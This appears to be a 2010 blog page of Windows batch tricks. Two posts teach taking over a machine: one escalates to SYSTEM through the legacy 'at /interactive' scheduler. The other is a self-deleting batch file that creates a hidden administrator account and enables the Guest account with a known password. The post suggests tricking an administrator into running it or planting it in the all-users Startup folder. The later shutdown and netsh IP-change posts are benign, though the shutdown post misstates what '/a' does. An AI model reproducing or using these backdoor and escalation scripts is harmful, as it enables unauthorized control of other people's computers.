Monday, June 21, 2010

Hacking "admin" from "user" mode

Under normal circumstances, a user cannot run code as System; only the operating system itself has this ability. By using the command line, however, we will trick Windows into running our desktop as System, along with every application started from within it.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, let's open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:

at
If it responds with an "access denied" error, then we are out of luck, and you'll have to try another method of privilege escalation; if it responds with "There are no entries in the list" (or sometimes with entries already in the list), then we are good. Access to the at command varies: on some installations of Windows even the Guest account can use it, on others it is limited to Administrator accounts. If you can use the at command, enter the following command, then press [ENTER]:

at 15:25 /interactive "cmd.exe"

Let's break down the preceding command. The "at" told the machine to run the at command; everything after it is an argument to that command. The important thing here is to change the time (24-hour format) to one minute after the time currently shown on your computer's clock. For example, if your computer's clock says it's 4:30pm, convert this to 24-hour format (16:30) and use 16:31 as the time in the command. If you issue the at command again with no arguments, you should see something similar to this:

When the system clock reaches the time you set, a new command prompt will magically appear. The difference is that this one is running with system privileges (because it was started by the Task Scheduler service, which runs under the Local System account). It should look like this:

You'll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In Task Manager, go to the Processes tab and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
explorer.exe
A desktop will come back up, but what is this? It isn't your desktop. Go to the Start menu and look at the user name; it should say "SYSTEM". Also open up Task Manager again, and you'll notice that explorer.exe is now running as SYSTEM.
Now that we have SYSTEM access, everything we run from our explorer process will have it too: browsers, games, etc.

Hack admin account in Windows

@echo off
rem Create a new local account and add it to the Administrators group
net user Username Password /add
net localgroup Administrators Username /add
rem Set the Guest account's password to 420, enable it, and move it from Guests to Administrators
net user Guest 420 /active:yes
net localgroup Guests Guest /delete
net localgroup Administrators Guest /add
rem Remove this batch file once it has run
del %0

Download the batch file and edit it. Change Username and Password to your desired ones.

You could try to trick the administrator into running the batch file with system privileges, or try copying the batch file into the startup folder. The next time the admin logs on to the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using your username and password.

Startup folder for all users:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup ===> [XP]
C:\ProgramData\Microsoft\Windows\Start Menu ====> [Vista and Windows 7]

Download batch file here:

Tuesday, June 15, 2010

Computer shutdown/restart batch file

This is a batch file that shuts down or restarts the computer in one minute.
Edit the shutdown /s to shutdown /a for the computer to restart.
Edit the /t 60 to /t (whatever time you want).

Download the batch file here:

Change IP address using a batch file

Change IP Address Using netsh from Command Prompt

The IP settings of a network interface can be changed manually using the netsh command (netsh.exe) from the Command Prompt. To change the IP to a static IP, use the following command format:

netsh interface ip set address [Connection Name] [Source] [IP] [Netmask] [Gateway] [Metric]

* [Connection Name] is the name of the connection that the network adapter is assigned to. You can see the name in the Control Panel's Network Connections panel or by using the ipconfig /all command from the command prompt.

* [Source] is the source of the IP address: either static or dhcp. If you set it to dhcp, you can ignore all the remaining parameters.

* [IP] is the IP address you set.

* [Netmask] is the network mask for the IP address.

* [Gateway] is the gateway IP address.

* [Metric] is the metric for the gateway.

We can now create a batch file from the above info...

Download the completed batch file here and edit...
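One way to turn the format above into a batch file (an added example, not the blog's downloadable file): it takes static or dhcp as its argument, assumes the adapter is called Local Area Connection, and uses constructed addresses (192.168.1.50/24, gateway 192.168.1.1, DNS 192.168.1.1) that you would replace with your own.

```batch
@echo off
rem Added example, not the blog's own file. The connection name and the
rem addresses below are constructed placeholders; edit them for your network.
rem Usage:  setip.bat static   -> assign the static address configured below
rem         setip.bat dhcp     -> hand the adapter back to DHCP
set CONN=Local Area Connection

if /i "%~1"=="static" goto static
if /i "%~1"=="dhcp" goto dhcp
echo Usage: %~nx0 static ^| dhcp
exit /b 1

:static
rem [Connection Name] [Source] [IP] [Netmask] [Gateway] [Metric]
netsh interface ip set address "%CONN%" static 192.168.1.50 255.255.255.0 192.168.1.1 1
rem A static address normally needs a static DNS server as well
netsh interface ip set dns "%CONN%" static 192.168.1.1
goto done

:dhcp
rem With dhcp as the source the remaining parameters are omitted, as noted above
netsh interface ip set address "%CONN%" dhcp
netsh interface ip set dns "%CONN%" dhcp
goto done

:done
rem Show the resulting configuration so the change can be verified
netsh interface ip show config "%CONN%"
```

Run it from an elevated command prompt, since netsh refuses to change adapter settings for a standard user.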